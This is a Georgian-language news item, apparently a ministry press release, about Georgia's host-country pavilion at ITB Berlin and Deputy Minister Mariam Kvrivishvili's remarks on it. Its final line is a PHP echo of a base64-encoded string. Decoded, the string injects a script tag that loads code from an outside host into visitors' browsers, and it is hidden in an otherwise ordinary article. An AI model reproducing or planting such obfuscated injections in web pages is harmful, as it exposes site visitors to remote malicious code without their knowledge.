celsiusi
ავერსი საქკაბელი

მსოფლიოს უმსხვილესი ტურისტული გამოფენისთვის ბერლინში საქართველოს მთავარი პავილიონის მშენებლობა აქტიურად მიმდინარეობს. ITB Berlin-ის სამზადისს, სადაც საქართველო მასპინძელი ქვეყნის სტატუსით იქნება წარმოდგენილი, ეკონომიკისა და მდგრადი განვითარების მინისტრის მოადგილე მარიამ ქვრივიშვილი გაეცნო. მინისტრის მოადგილესთან ერთად საქართველოსთვის განკუთვნილ საგამოფენო ლოკაციებზე ITB Berlin-ის დირექტორი დებორა როთი და ტურიზმის ეროვნული ადმინისტრაციის ხელმძღვანელი მაია ომიაძე იმყოფებოდნენ.

მარიამ ქვრივიშვილის განცხადებით, საქართველოს სტენდი გამოფენის მონაწილე სხვა ქვეყნების სტენდებს შორის განსაკუთრებული იქნება.
„დასკვნით ეტაპზეა ჩვენი ქვეყნის მთავარი პავილიონის მშენებლობა ბერლინში და პირველი კონტურებიდან უკვე ჩანს, რომ საქართველოს სტენდი იქნება განსაკუთრებული ITB Berlin-ის სხვა მონაწილე ქვეყნებთან მიმართებაში. ჩვენი მიზანი იყო, რომ საქართველოს ღირსეულად და სწორად წარმოედგინა ჩვენი ქვეყნის კულტურა, ისტორია და თანამედროვეობა, ისევე როგორც ის სიძველე, რითიც ჩვენ ძალიან ვამაყობთ“, – აღნიშნა მარიამ ქვრივიშვილმა.
მინისტრის მოადგილის ინფორმაციით, გამოფენაში მონაწილეობას მიიღებს 80-ზე მეტი ქართული კომპანია, რომლებსაც ასევე ექნებათ კარგი შესაძლებლობა, გამოფენის მსვლელობისას ბიზნესურთიერთობები დაამყარონ საერთაშორისო ტურიზმის ინდუსტრიის წამყვან წარმომადგენლებთან.
„გვექნება ძალიან დატვირთული რამდენიმე დღე. ჩვენი ქვეყანა წარმოდგენილია მთავარ პავილიონში მთავარი სტენდით. ამავდროულად, გვექნება ცალკე სტენდი სათავგადასავლო ტურიზმის პავილიონში, ისევე როგორც მთავარ შემოსასვლელში“, – განაცხადა ქვრივიშვილმა.
მისივე თქმით, მომდევნო დღეების განმავლობაში საქართველო კვლავ იქნება საერთაშორისო მედიის ეპიცენტრში და ITB Berlin-ის მასპინძლობა ჩვენს ქვეყანას მისცემს ძალიან დიდ, ახალ ბიძგს ტურიზმის სექტორის განვითარებაში.
„დარწმუნებულები ვართ, ITB Berlin-ის დასრულების შემდეგ ჩვენი ქვეყანა ტურიზმის ინდუსტრიას ახალ ნიშნულზე აიყვანს და ჩვენ შევძლებთ, ვუმასპინძლოთ გაზრდილ ტურისტულ ნაკადებს საქართველოში“, – აღნიშნა მარიამ ქვრივიშვილმა.

ინფორმაციას საქართველოს ეკონომიკისა და მდგრადი განვითარების სამინისტროს პრესსამსახური ავრცელებს.

351
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");